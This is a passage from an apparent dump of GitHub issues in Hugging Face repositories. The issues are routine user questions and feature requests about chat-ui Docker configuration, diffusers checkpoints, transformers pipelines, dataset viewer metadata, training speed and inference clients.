proxy ghcr.io/huggingface/chat-ui-db && sudo docker network connect backend chat-ui\r\n```\r\n`docker-compose.yml` :\r\n\r\n```YAML\r\nservices:\r\n nginx:\r\n image: nginx:latest\r\n container_name: nginx\r\n ports:\r\n - 80:80\r\n - 443:443\r\n networks:\r\n - proxy\r\n volumes:\r\n - ./nginx:/etc/nginx/conf.d\r\n - ./ssl:/etc/ssl\r\n restart: unless-stopped\r\n\r\n ollama:\r\n build:\r\n context: ./ollama\r\n dockerfile: Dockerfile\r\n image: ollama-with-ca\r\n container_name: ollama\r\n ports:\r\n - 11434:11434\r\n networks:\r\n - backend\r\n environment:\r\n - HTTPS_PROXY=http://:@proxy.test.fr:8090\r\n volumes:\r\n - ollama-data:/data\r\n restart: unless-stopped\r\n entrypoint: [\"/bin/bash\", \"start-mistral.sh\"]\r\n\r\nnetworks:\r\n backend:\r\n proxy:\r\n external: true\r\n\r\nvolumes:\r\n ollama-data:\r\n```\r\n\r\n`.env.local` :\r\n\r\n```\r\nMONGODB_URL=mongodb://mongodb:27017\r\nHF_TOKEN=hf_*****\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"Ollama Mistral\",\r\n \"chatPromptTemplate\": \"{{#each messages}}{{#ifUser}}[INST] {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{\r\n\r\n{/if}\r\n\r\n}{\r\n\r\n{/if}\r\n\r\n} {{content}} [/INST]{{/ifUser}}{{#ifAssistant}}{{content}} {{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"
\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"ollama\",\r\n \"url\" : \"ollama://ollama:11434\",\r\n \"ollamaName\" : \"mistral\"\r\n }\r\n ]\r\n }\r\n]`\r\n```\r\n\r\nWhen I start my script, at the end of the execution, the container doesn't want to launch, I get the following error :\r\n\r\n```sh\r\ndocker: poorly formatted environment: variable '\"name\": \"Ollama Mistral\",' contains whitespaces.\r\nSee 'docker run --help'.\r\n```\r\n\r\nI already tried to put `chat-ui` and `mongodb` containers in the `docker-compose.yml` and it doesn't works, same as this issue : https://github.com/huggingface/chat-ui/issues/614 \r\n\r\nAny solutions ?\r\n\r\nThanks in advance.\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1436", "state": "closed", "labels": [ "support" ], "created_at": "2024-08-26T14:00:26Z", "updated_at": "2024-08-27T11:04:39Z", "comments": 5, "user": "avirgos" }, { "repo": "huggingface/diffusers", "number": 9276, "title": "How can I manually update some of their checkpoints of UNet2/3DConditionModel objects?", "body": "### Discussed in https://github.com/huggingface/diffusers/discussions/9273\r\n\r\n
\r\n\r\nOriginally posted by **justin4ai** August 26, 2024\r\nHello, I'm quite new to diffusers package and trying to implement fine-tuning code that uses the saved checkpoints initialized with ```UNet2/3DConditionModel.from_pretrained``` method as shown below:\r\n\r\n```python\r\n\r\n reference_unet = UNet2DConditionModel.from_pretrained( # ReferenceNet\uc740 2D condition\ub9cc \ubc1b\uc74c (reference image via CLIP)\r\n cfg.base_model_path,\r\n subfolder=\"unet\",\r\n ).to(device=\"cuda\")\r\n\r\n denoising_unet = UNet3DConditionModel.from_pretrained_2d(\r\n cfg.base_model_path,\r\n \"\",\r\n subfolder=\"unet\",\r\n unet_additional_kwargs={\r\n \"use_motion_module\": False,\r\n \"unet_use_temporal_attention\": False, \r\n },\r\n ).to(device=\"cuda\")\r\n\r\n prev = denoising_unet.state_dict()\r\n\r\n li = torch.load(\"./pretrained_weights/denoising_unet.pth\")\r\n\r\n for key in li:\r\n denoising_unet[key] = li[key] # I know this kind of direct assigning to the object doesn't make sense though.\r\n reference_unet.load_state_dict(torch.load(\"./pretrained_weights/reference_unet.pth\"))\r\n\r\n```\r\n\r\nThe checkpoint I try to load is saved from the previous training of ``` UNet2/3DConditionModel objects``` with ```state_dict = model.state_dict()``` and ```torch.save(state_dict, save_path)```. But I have no Idea about how to directly assign certain values to specific layers in those class objects.\r\n\r\nIf you help me out with this, I will be so much glad! Looking forward to your help. Also please let me know if my description of the situation is not enough for you to help me out.\r\n\r\nCheers,\r\nJunstin
", "url": "https://github.com/huggingface/diffusers/issues/9276", "state": "open", "labels": [ "stale" ], "created_at": "2024-08-26T07:49:23Z", "updated_at": "2024-09-25T15:03:01Z", "comments": 1, "user": "justin4ai" }, { "repo": "huggingface/transformers", "number": 33115, "title": "How to get the score of each token when using pipeline", "body": "pipe = pipeline(\r\n \"text-generation\",\r\n model=model,\r\n tokenizer=tokenizer,\r\n max_new_tokens=512,\r\n do_sample=True,\r\n temperature=0.7,\r\n top_p=0.95,\r\n top_k=40,\r\n repetition_penalty=1.1,\r\n output_scores=True\r\n)\r\n\r\nThe model I use is Qwen2-7B-Instruct. When I try to output the score of each token by modifying the parameters, it doesn't work.", "url": "https://github.com/huggingface/transformers/issues/33115", "state": "closed", "labels": [ "Usage" ], "created_at": "2024-08-26T07:00:54Z", "updated_at": "2025-03-06T08:23:58Z", "user": "xin0623" }, { "repo": "huggingface/diffusers", "number": 9271, "title": "The different quality between ComfyUI and Diffusers ?", "body": "### Discussed in https://github.com/huggingface/diffusers/discussions/9265\r\n\r\n
\r\n\r\nOriginally posted by **vuongminh1907** August 25, 2024\r\nI had a problem using InstantID (https://github.com/instantX-research/InstantID), which uses Diffusers as its base. Additionally, I tried ComfyUI (https://github.com/cubiq/ComfyUI_InstantID), and the quality of the images improved better I think.\r\n\r\nI discussed this with Cubiq, and he mentioned that there are no differences in how they applied the IP Adapter (https://github.com/cubiq/ComfyUI_InstantID/issues/206).\r\n\r\n![image](https://github.com/user-attachments/assets/a0ec4a7a-aad0-4575-8617-cdae8dea5f16)\r\n\r\nCan you explain this issue to me? Perhaps it\u2019s related to the Sampler in ComfyUI and Diffusers.
", "url": "https://github.com/huggingface/diffusers/issues/9271", "state": "closed", "labels": [ "stale" ], "created_at": "2024-08-26T02:53:23Z", "updated_at": "2024-10-15T18:10:42Z", "comments": 3, "user": "vuongminh1907" }, { "repo": "huggingface/diffusers", "number": 9264, "title": "Could you make an inpainting model for flux?", "body": "### Model/Pipeline/Scheduler description\n\nThe [stable-diffusion-xl-1.0-inpainting-0.1](https://huggingface.co/diffusers/stable-diffusion-xl-1.0-inpainting-0.1) model helps a lot. Could you make a similar inpainting model for flux?\r\n\r\nhttps://huggingface.co/black-forest-labs/FLUX.1-dev\n\n### Open source status\n\n- [ ] The model implementation is available.\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nhttps://huggingface.co/diffusers/stable-diffusion-xl-1.0-inpainting-0.1\r\nhttps://huggingface.co/black-forest-labs/FLUX.1-dev", "url": "https://github.com/huggingface/diffusers/issues/9264", "state": "closed", "labels": [], "created_at": "2024-08-24T17:32:32Z", "updated_at": "2024-08-24T17:37:59Z", "comments": 2, "user": "snowbedding" }, { "repo": "huggingface/transformers", "number": 33106, "title": "how to fine tune TrOCR on specifique langage guide.", "body": "### Model description\n\nhello , just passed through issues and other , but none of them talked on how to fine-tune TrOCR on specifique langage , like how to pick encoder and decoder , model .. etc , \r\ncan you @NielsRogge , write a simple instructions/guide on this topic ?\r\n\n\n### Open source status\n\n- [ ] The model implementation is available\n- [ ] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/33106", "state": "closed", "labels": [], "created_at": "2024-08-24T14:33:02Z", "updated_at": "2025-06-15T08:07:10Z", "user": "MohamedLahmeri01" }, { "repo": "huggingface/datasets", "number": 7123, "title": "Make dataset viewer more flexible in displaying metadata alongside images", "body": "### Feature request\r\n\r\nTo display images with their associated metadata in the dataset viewer, a `metadata.csv` file is required. In the case of a dataset with multiple subsets, this would require the CSVs to be contained in the same folder as the images since they all need to be named `metadata.csv`. The request is that this be made more flexible for datasets with multiple subsets to avoid the need to put a `metadata.csv` into each image directory where they are not as easily accessed. \r\n\r\n### Motivation\r\n\r\nWhen creating datasets with multiple subsets I can't get the images to display alongside their associated metadata (it's usually one or the other that will show up). Since this requires a file specifically named `metadata.csv`, I then have to place that file within the image directory, which makes it much more difficult to access. Additionally, it still doesn't necessarily display the images alongside their metadata correctly (see, for instance, [this discussion](https://huggingface.co/datasets/imageomics/2018-NEON-beetles/discussions/8)).\r\n\r\nIt was suggested I bring this discussion to GitHub on another dataset struggling with a similar issue ([discussion](https://huggingface.co/datasets/imageomics/fish-vista/discussions/4)). In that case, it's a mix of data subsets, where some just reference the image URLs, while others actually have the images uploaded. The ones with images uploaded are not displaying images, but renaming that file to just `metadata.csv` would diminish the clarity of the construction of the dataset itself (and I'm not entirely convinced it would solve the issue).\r\n\r\n### Your contribution\r\n\r\nI can make a suggestion for one approach to address the issue:\r\n\r\nFor instance, even if it could just end in `_metadata.csv` or `-metadata.csv`, that would be very helpful to allow for more flexibility of dataset structure without impacting clarity. I would think that the functionality on the backend looking for `metadata.csv` could reasonably be adapted to look for such an ending on a filename (maybe also check that it has a `file_name` column?).\r\n\r\nPresumably, requiring the `configs` in a setup like on [this dataset](https://huggingface.co/datasets/imageomics/rare-species/blob/main/README.md) could also help in figuring out how it should work?\r\n```\r\nconfigs:\r\n - config_name: \r\n data_files:\r\n - .csv\r\n - /*.jpg\r\n```\r\n\r\nI'd also be happy to look at whatever solution is decided upon and contribute to the ideation.\r\n\r\nThanks for your time and consideration! The dataset viewer really is fabulous when it works :)", "url": "https://github.com/huggingface/datasets/issues/7123", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-08-23T22:56:01Z", "updated_at": "2024-10-17T09:13:47Z", "comments": 3, "user": "egrace479" }, { "repo": "huggingface/diffusers", "number": 9258, "title": "Kohya SS FLUX LoRA training is way faster on Linux than Windows any ideas to debug? Same settings, libraries and GPU", "body": "### Describe the bug\r\n\r\nI am using Kohya SS to train FLUX LoRA\r\n\r\nOn Linux RTX 3090 gets like 5.5 second / it - batch size 1 and 1024x1024 px resolution\r\n\r\nOn Windows RTX 3090 TI gets 7.7 second / it - has the most powerful CPU 13900 K\r\n\r\nThis speed dispercany is huge between Windows and Linux for some reason \r\n\r\nTorch upgrade from 2.1 to 2.4 on Linux caused huge speed up and VRAM usage reduction but on Windows only VRAM usage dropped - speed same\r\n\r\nAny ideas for how to fix? Using SDPA Cross Attention \r\n\r\nI am sharing venv pip freeze of both Windows and Linux\r\n\r\nBoth has Python 3.10.11\r\n\r\n**Windows pip freeze**\r\n\r\n```\r\nMicrosoft Windows [Version 10.0.19045.4717]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nR:\\Kohya_GUI_Flux_Installer\\kohya_ss\\venv\\Scripts>activate\r\n\r\n(venv) R:\\Kohya_GUI_Flux_Installer\\kohya_ss\\venv\\Scripts>pip freeze\r\nabsl-py==2.1.0\r\naccelerate==0.33.0\r\naiofiles==23.2.1\r\naiohappyeyeballs==2.4.0\r\naiohttp==3.10.5\r\naiosignal==1.3.1\r\naltair==4.2.2\r\nannotated-types==0.7.0\r\nantlr4-python3-runtime==4.9.3\r\nanyio==4.4.0\r\nappdirs==1.4.4\r\nastunparse==1.6.3\r\nasync-timeout==4.0.3\r\nattrs==24.2.0\r\nbitsandbytes==0.43.3\r\ncertifi==2022.12.7\r\ncharset-normalizer==2.1.1\r\nclick==8.1.7\r\ncolorama==0.4.6\r\ncoloredlogs==15.0.1\r\ncontourpy==1.2.1\r\ncycler==0.12.1\r\ndadaptation==3.2\r\ndiffusers==0.25.0\r\ndocker-pycreds==0.4.0\r\neasygui==0.98.3\r\neinops==0.7.0\r\nentrypoints==0.4\r\nexceptiongroup==1.2.2\r\nfairscale==0.4.13\r\nfastapi==0.112.1\r\nffmpy==0.4.0\r\nfilelock==3.13.1\r\nflatbuffers==24.3.25\r\nfonttools==4.53.1\r\nfrozenlist==1.4.1\r\nfsspec==2024.2.0\r\nftfy==6.1.1\r\ngast==0.6.0\r\ngitdb==4.0.11\r\nGitPython==3.1.43\r\ngoogle-pasta==0.2.0\r\ngradio==4.41.0\r\ngradio_client==1.3.0\r\ngrpcio==1.65.5\r\nh11==0.14.0\r\nh5py==3.11.0\r\nhttpcore==1.0.5\r\nhttpx==0.27.0\r\nhuggingface-hub==0.24.5\r\nhumanfriendly==10.0\r\nidna==3.4\r\nimagesize==1.4.1\r\nimportlib_metadata==8.4.0\r\nimportlib_resources==6.4.4\r\ninvisible-watermark==0.2.0\r\nJinja2==3.1.3\r\njsonschema==4.23.0\r\njsonschema-specifications==2023.12.1\r\nkeras==3.5.0\r\nkiwisolver==1.4.5\r\nlibclang==18.1.1\r\n-e git+https://github.com/kohya-ss/sd-scripts.git@e1cd19c0c0ef55709e8eb1e5babe25045f65031f#egg=library&subdirectory=..\\..\\sd-scripts\r\nlightning-utilities==0.11.6\r\nlion-pytorch==0.0.6\r\nlycoris-lora==2.2.0.post3\r\nMarkdown==3.7\r\nmarkdown-it-py==3.0.0\r\nMarkupSafe==2.1.5\r\nmatplotlib==3.9.2\r\nmdurl==0.1.2\r\nml-dtypes==0.4.0\r\nmpmath==1.3.0\r\nmultidict==6.0.5\r\nnamex==0.0.8\r\nnetworkx==3.2.1\r\nnumpy==1.26.3\r\nnvidia-cublas-cu12==12.4.2.65\r\nnvidia-cuda-cupti-cu12==12.4.99\r\nnvidia-cuda-nvrtc-cu12==12.4.99\r\nnvidia-cuda-runtime-cu12==12.4.99\r\nnvidia-cudnn-cu12==9.1.0.70\r\nnvidia-cufft-cu12==11.2.0.44\r\nnvidia-curand-cu12==10.3.5.119\r\nnvidia-cusolver-cu12==11.6.0.99\r\nnvidia-cusparse-cu12==12.3.0.142\r\nnvidia-nvjitlink-cu12==12.4.99\r\nnvidia-nvtx-cu12==12.4.99\r\nomegaconf==2.3.0\r\nonnx==1.16.1\r\nonnxruntime-gpu==1.17.1\r\nopen-clip-torch==2.20.0\r\nopencv-python==4.7.0.68\r\nopt-einsum==3.3.0\r\noptree==0.12.1\r\norjson==3.10.7\r\npackaging==24.1\r\npandas==2.2.2\r\npathtools==0.1.2\r\npillow==10.2.0\r\nprodigyopt==1.0\r\nprotobuf==3.20.3\r\npsutil==6.0.0\r\npydantic==2.8.2\r\npydantic_core==2.20.1\r\npydub==0.25.1\r\nPygments==2.18.0\r\npyparsing==3.1.2\r\npyreadline3==3.4.1\r\npython-dateutil==2.9.0.post0\r\npython-multipart==0.0.9\r\npytorch-lightning==1.9.0\r\npytz==2024.1\r\nPyWavelets==1.7.0\r\nPyYAML==6.0.2\r\nreferencing==0.35.1\r\nregex==2024.7.24\r\nrequests==2.32.3\r\nrich==13.7.1\r\nrpds-py==0.20.0\r\nruff==0.6.1\r\nsafetensors==0.4.4\r\nscipy==1.11.4\r\nsemantic-version==2.10.0\r\nsentencepiece==0.2.0\r\nsentry-sdk==2.13.0\r\nsetproctitle==1.3.3\r\nshellingham==1.5.4\r\nsix==1.16.0\r\nsmmap==5.0.1\r\nsniffio==1.3.1\r\nstarlette==0.38.2\r\nsympy==1.12\r\ntensorboard==2.17.1\r\ntensorboard-data-server==0.7.2\r\ntensorflow==2.17.0\r\ntensorflow-intel==2.17.0\r\ntensorflow-io-gcs-filesystem==0.31.0\r\ntermcolor==2.4.0\r\ntimm==0.6.12\r\ntk==0.1.0\r\ntokenizers==0.19.1\r\ntoml==0.10.2\r\ntomlkit==0.12.0\r\ntoolz==0.12.1\r\ntorch==2.4.0+cu124\r\ntorchmetrics==1.4.1\r\ntorchvision==0.19.0+cu124\r\ntqdm==4.66.5\r\ntransformers==4.44.0\r\ntyper==0.12.4\r\ntyping_extensions==4.9.0\r\ntzdata==2024.1\r\nurllib3==2.2.2\r\nuvicorn==0.30.6\r\nvoluptuous==0.13.1\r\nwandb==0.15.11\r\nwcwidth==0.2.13\r\nwebsockets==12.0\r\nWerkzeug==3.0.4\r\nwrapt==1.16.0\r\nxformers==0.0.27.post2\r\nyarl==1.9.4\r\nzipp==3.20.0\r\n\r\n(venv) R:\\Kohya_GUI_Flux_Installer\\kohya_ss\\venv\\Scripts>\r\n```\r\n\r\n**Ubuntu pip freeze**\r\n\r\n```\r\n(venv) Ubuntu@0054-kci-prxmx10136:~/apps/kohya_ss$ pip freeze\r\nabsl-py==2.1.0\r\naccelerate==0.33.0\r\naiofiles==23.2.1\r\naiohttp==3.9.5\r\naiosignal==1.3.1\r\naltair==4.2.2\r\nannotated-types==0.7.0\r\nantlr4-python3-runtime==4.9.3\r\nanyio==4.4.0\r\nappdirs==1.4.4\r\nastunparse==1.6.3\r\nasync-timeout==4.0.3\r\nattrs==23.2.0\r\nbitsandbytes==0.43.3\r\ncachetools==5.3.3\r\ncertifi==2024.2.2\r\ncharset-normalizer==3.3.2\r\nclick==8.1.7\r\ncoloredlogs==15.0.1\r\ncontourpy==1.2.1\r\ncycler==0.12.1\r\ndadaptation==3.1\r\ndiffusers==0.25.0\r\ndnspython==2.6.1\r\ndocker-pycreds==0.4.0\r\neasygui==0.98.3\r\neinops==0.7.0\r\nemail_validator==2.1.1\r\nentrypoints==0.4\r\nexceptiongroup==1.2.1\r\nfairscale==0.4.13\r\nfastapi==0.111.0\r\nfastapi-cli==0.0", "url": "https://github.com/huggingface/diffusers/issues/9258", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-23T11:42:53Z", "updated_at": "2024-08-23T11:55:18Z", "comments": 1, "user": "FurkanGozukara" }, { "repo": "huggingface/datasets", "number": 7122, "title": "[interleave_dataset] sample batches from a single source at a time", "body": "### Feature request\n\ninterleave_dataset and [RandomlyCyclingMultiSourcesExamplesIterable](https://github.com/huggingface/datasets/blob/3813ce846e52824b38e53895810682f0a496a2e3/src/datasets/iterable_dataset.py#L816) enable us to sample data examples from different sources. But can we also sample batches in a similar manner (each batch only contains data from a single source)?\r\n\n\n### Motivation\n\nSome recent research [[1](https://blog.salesforceairesearch.com/sfr-embedded-mistral/), [2](https://arxiv.org/pdf/2310.07554)] shows that source homogenous batching can be helpful for contrastive learning. Can we add a function called `RandomlyCyclingMultiSourcesBatchesIterable` to support this functionality?\n\n### Your contribution\n\nI can contribute a PR. But I wonder what the best way is to test its correctness and robustness.", "url": "https://github.com/huggingface/datasets/issues/7122", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-08-23T07:21:15Z", "updated_at": "2024-08-23T07:21:15Z", "comments": 0, "user": "memray" }, { "repo": "huggingface/text-generation-inference", "number": 2452, "title": "How to get the token probability by curl request?", "body": "### Feature request\n\ncurl -v -X POST http://.....srv/generate -H \"Content-Type: application/json\" -d '{\"inputs\": \"xxxxx:\",\"parameters\": {\"max_new_tokens\": 256}}'\r\nuser this curl request, get output like\r\n{\"generated_text\": xxxx}\r\n\r\nhow to get generated text probability from llm in TGI service?\r\n\r\n\n\n### Motivation\n\nno\n\n### Your contribution\n\nno", "url": "https://github.com/huggingface/text-generation-inference/issues/2452", "state": "closed", "labels": [], "created_at": "2024-08-23T03:01:17Z", "updated_at": "2024-08-27T01:32:44Z", "user": "TWSFar" }, { "repo": "huggingface/speech-to-speech", "number": 37, "title": "[Feature request] How about adding an optional speech to viseme model at the end of our chain?", "body": "Hi there,\r\n\r\nThank you so much for your work on this project. It's truly amazing, and I\u2019m excited to see all the innovative tools that people will build based on it. I can already imagine many will integrate your speech-to-speech pipeline with avatar or robot embodiments, where lip sync will be crucial. \r\n\r\nTo support this, could you help us add functionality to the current flow? The current process includes 1) speech-to-text, 2) LLM, and 3) text-to-speech. I\u2019d like to add a fourth step: either speech-to-viseme or speech-to-text with `return_timestamp = \"word\"`, followed by manual mapping of words to phonemes, and then to visemes.\r\n\r\nBest regards, \r\nFabio", "url": "https://github.com/huggingface/speech-to-speech/issues/37", "state": "open", "labels": [], "created_at": "2024-08-22T21:32:47Z", "updated_at": "2024-09-09T17:16:45Z", "user": "fabiocat93" }, { "repo": "huggingface/huggingface_hub", "number": 2480, "title": "How to use the HF Nvidia NIM API with the HF inference client?", "body": "### Describe the bug\r\n\r\nWe recently introduced the [Nvidia NIM API](https://huggingface.co/blog/inference-dgx-cloud) for selected models. The recommended use is via the OAI client like this (with a specific fine-grained token for an enterprise org): \r\n\r\n```py\r\nfrom openai import OpenAI\r\n\r\nclient = OpenAI(\r\n base_url=\"https://huggingface.co/api/integrations/dgx/v1\",\r\n api_key=\"YOUR_FINE_GRAINED_TOKEN_HERE\"\r\n)\r\n\r\nchat_completion = client.chat.completions.create(\r\n model=\"meta-llama/Meta-Llama-3-8B-Instruct\",\r\n messages=[\r\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\r\n {\"role\": \"user\", \"content\": \"Count to 500\"}\r\n ],\r\n stream=True,\r\n max_tokens=1024\r\n)\r\n\r\n# Iterate and print stream\r\nfor message in chat_completion:\r\n print(message.choices[0].delta.content, end='')\r\n```\r\n\r\nHow can users use this API with the HF inference client directly? \r\nThe InferenceClient.chat_completions [docs](https://huggingface.co/docs/huggingface_hub/main/en/package_reference/inference_client#huggingface_hub.InferenceClient.chat_completion) provide this example snippet for OAI syntax (example 3): \r\n\r\n```py\r\n# instead of `from openai import OpenAI`\r\nfrom huggingface_hub import InferenceClient\r\n\r\n# instead of `client = OpenAI(...)`\r\nclient = InferenceClient(\r\n base_url=...,\r\n api_key=...,\r\n)\r\n\r\noutput = client.chat.completions.create(\r\n model=\"meta-llama/Meta-Llama-3-8B-Instruct\",\r\n messages=[\r\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\r\n {\"role\": \"user\", \"content\": \"Count to 10\"},\r\n ],\r\n stream=True,\r\n max_tokens=1024,\r\n)\r\n\r\nfor chunk in output:\r\n print(chunk.choices[0].delta.content)\r\n```\r\n\r\nWhen I transpose the logic from the NIM OAI code snippet to the code above, I get this: \r\n\r\n```py\r\n# instead of `from openai import OpenAI`\r\nfrom huggingface_hub import InferenceClient\r\n\r\n# instead of `client = OpenAI(...)`\r\nclient = InferenceClient(\r\n api_key=\"enterprise-org-token\",\r\n base_url=\"https://huggingface.co/api/integrations/dgx/v1\",\r\n)\r\n\r\noutput = client.chat.completions.create(\r\n model=\"meta-llama/Meta-Llama-3-8B-Instruct\",\r\n messages=[\r\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\r\n {\"role\": \"user\", \"content\": \"Count to 10\"},\r\n ],\r\n stream=True,\r\n max_tokens=1024,\r\n)\r\n\r\nfor chunk in output:\r\n print(chunk.choices[0].delta.content)\r\n```\r\n\r\nThis throws this error: \r\n```py\r\n---------------------------------------------------------------------------\r\nHTTPError Traceback (most recent call last)\r\nFile ~/miniconda/lib/python3.9/site-packages/huggingface_hub/utils/_errors.py:304, in hf_raise_for_status(response, endpoint_name)\r\n 303 try:\r\n--> 304 response.raise_for_status()\r\n 305 except HTTPError as e:\r\n\r\nFile ~/miniconda/lib/python3.9/site-packages/requests/models.py:1024, in Response.raise_for_status(self)\r\n 1023 if http_error_msg:\r\n-> 1024 raise HTTPError(http_error_msg, response=self)\r\n\r\nHTTPError: 400 Client Error: Bad Request for url: https://huggingface.co/api/integrations/dgx/v1/chat/completions\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nBadRequestError Traceback (most recent call last)\r\nCell In[48], line 10\r\n 4 # instead of `client = OpenAI(...)`\r\n 5 client = InferenceClient(\r\n 6 api_key=\"hf_****\",\r\n 7 base_url=\"https://huggingface.co/api/integrations/dgx/v1\",\r\n 8 )\r\n---> 10 output = client.chat.completions.create(\r\n 11 model=\"meta-llama/Meta-Llama-3-8B-Instruct\",\r\n 12 messages=[\r\n 13 {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\r\n 14 {\"role\": \"user\", \"content\": \"Count to 10\"},\r\n 15 ],\r\n 16 stream=True,\r\n 17 max_tokens=1024,\r\n 18 )\r\n 20 for chunk in output:\r\n 21 print(chunk.choices[0].delta.content)\r\n\r\nFile ~/miniconda/lib/python3.9/site-packages/huggingface_hub/inference/_client.py:837, in InferenceClient.chat_completion(self, messages, model, stream, frequency_penalty, logit_bias, logprobs, max_tokens, n, presence_penalty, response_format, seed, stop, temperature, tool_choice, tool_prompt, tools, top_logprobs, top_p)\r\n 833 # `model` is sent in the payload. Not used by the server but can be useful for debugging/routing.\r\n 834 # If it's a ID on the Hub => use it. Otherwise, we use a random string.\r\n 835 model_id = model if not is_url and model.count(\"/\") == 1 else \"tgi\"\r\n--> 837 data = self.post(\r\n 838 model=model_url,\r\n 839 json=dict(\r\n 840 model=model_id,\r\n 841 messages=messages,\r\n 842 frequency_penalty=frequency_penalty,\r\n 843 logit_bias=logit_bias,\r\n 844 logprobs=logprobs,\r\n 845 max_tokens=max_tokens,\r\n 846 n=n,\r\n 847 presence_penalty=presence_penalty,\r\n 848 response_format=response_format,\r\n 849 seed", "url": "https://github.com/huggingface/huggingface_hub/issues/2480", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-22T12:32:16Z", "updated_at": "2024-08-26T12:45:55Z", "user": "MoritzLaurer" }, { "repo": "huggingface/transformers.js", "number": 896, "title": "How to use this model: Xenova/bge-reranker-base", "body": "### Question\n\nI see that it supports transformers.js, but I can't find the instructions for use. Please help me with using it.", "url": "https://github.com/huggingface/transformers.js/issues/896", "state": "closed", "labels": [ "question" ], "created_at": "2024-08-22T07:33:42Z", "updated_at": "2024-08-29T00:12:52Z", "user": "gy9527" }, { "repo": "huggingface/sentence-transformers", "number": 2900, "title": "how to keep `encode_multi_process` output on the GPU", "body": "I saw this [example](https://github.com/UKPLab/sentence-transformers/blob/master/examples/applications/semantic-search/semantic_search.py) where we can do the following:\r\n`query_embedding = embedder.encode(query, convert_to_tensor=True)`\r\n`hits = util.semantic_search(query_embedding, corpus_embeddings, top_k=5)`\r\n\r\nI read that setting `convert_to_tensor=True` keeps the embedding vectors on the GPU to optimize the similarity calculations. But if I work with multiple CPUs and GPUs, can I do the same? I didn't see a `convert_to_tensor` argument for `encode_multi_process`. ", "url": "https://github.com/huggingface/sentence-transformers/issues/2900", "state": "open", "labels": [], "created_at": "2024-08-21T21:05:35Z", "updated_at": "2024-08-21T21:07:39Z", "user": "anshuchen" }, { "repo": "huggingface/parler-tts", "number": 116, "title": "How to use italian language?", "body": "It is possible use an italian style speaker? I've tried many prompt but all of this are in english style", "url": "https://github.com/huggingface/parler-tts/issues/116", "state": "open", "labels": [], "created_at": "2024-08-21T15:24:57Z", "updated_at": "2025-06-18T13:20:22Z", "user": "piperino11" }, { "repo": "huggingface/chat-ui", "number": 1423, "title": "Generated answers with Llama 3 include <|start_header_id|>assistant<|end_header_id|>", "body": "## Bug description\r\n\r\nI have set up a local endpoint serving Llama 3. All the answers I get from it start with `<|start_header_id|>assistant<|end_header_id|>`.\r\n\r\n## Steps to reproduce\r\n\r\nSet up Llama 3 in a local endpoint. In my `.env.local`, it is defined as the following:\r\n\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"llama3\",\r\n \"displayName\": \"Llama 3 loaded from GCS\",\r\n \"chatPromptTemplate\": \"<|begin_of_text|><|start_header_id|>system<|end_header_id|>\\n\\n{{preprompt}}<|eot_id|>{{#each messages}}{{#ifUser}}<|start_header_id|>user<|end_header_id|>\\n\\n{{content}}<|eot_id|><|start_header_id|>assistant<|end_header_id|>{{/ifUser}}{{#ifAssistant}}{{content}}<|eot_id|>{{/ifAssistant}}{{/each}}\",\r\n \"preprompt\": \"You are a helpful AI assistant.\",\r\n \"parameters\": {\r\n \"stop\": [\"<|endoftext|>\", \"<|eot_id|>\"],\r\n \"temperature\": 0.4,\r\n \"max_new_tokens\": 1024,\r\n \"truncate\": 3071\r\n },\r\n \"endpoints\": [{\r\n \"type\": \"openai\",\r\n \"baseURL\": \"http://localhost:8080/openai/v1\"\r\n }],\r\n }\r\n]`\r\n```\r\n\r\n## Context\r\n\r\nI have tried variations of the chat template, also not providing any. The `<|start_header_id|>assistant<|end_header_id|>` is always there.\r\n\r\nAFAIK, these tokens should be the last ones in the prompt, so that the model knows that it should continue the prompt with the assistant's answer. It seems they are not properly appended to the prompt, but the model still realizes it should add them itself.\r\n\r\n### Logs\r\n\r\nThis a sample request that my local server receives (running VLLM):\r\n\r\n```\r\nINFO 08-21 11:47:18 async_llm_engine.py:529] Received request cmpl-d1482c4eb4ce49c2a259a2f782ee3712-0: prompt: \"<|begin_of_text|><|start_header_id|>system<|end_header_id|>\r\n\r\nYou are a helpful AI assistant. Unless otherwise specified, give concise and straightforward answers.<|eot_id|><|start_header_id|>user<|end_header_id|>\r\n\r\n[ChatCompletionRequestMessageContentPartText(type='text', text='Hi, what is pizza?')]<|eot_id|>\", sampling_params: SamplingParams(n=1, best_of=1, presence_penalty=0.0, frequency_penalty=0.0, repetition_penalty=1.0, temperature=0.4, top_p=1.0, top_k=-1, min_p=0.0, seed=None, use_beam_search=False, length_penalty=1.0, early_stopping=False, stop=['<|endoftext|>', '<|eot_id|>'], stop_token_ids=[], include_stop_str_in_output=False, ignore_eos=False, max_tokens=1024, min_tokens=0, logprobs=None, prompt_logprobs=None, skip_special_tokens=True, spaces_between_special_tokens=True, truncate_prompt_tokens=None), prompt_token_ids: [128000, 128000, 128006, 9125, 128007, 271, 2675, 527, 264, 11190, 15592, 18328, 13, 11115, 6062, 5300, 11, 3041, 64694, 323, 31439, 11503, 13, 128009, 128006, 882, 128007, 271, 58, 16047, 34290, 1939, 2097, 2831, 5920, 1199, 5930, 1151, 1342, 518, 1495, 1151, 13347, 11, 1148, 374, 23317, 30, 52128, 128009], lora_request: None.\r\n```\r\n\r\n### Specs\r\n\r\n- **OS**: macOS\r\n- **Browser**: Firefox 129.0.1\r\n- **chat-ui 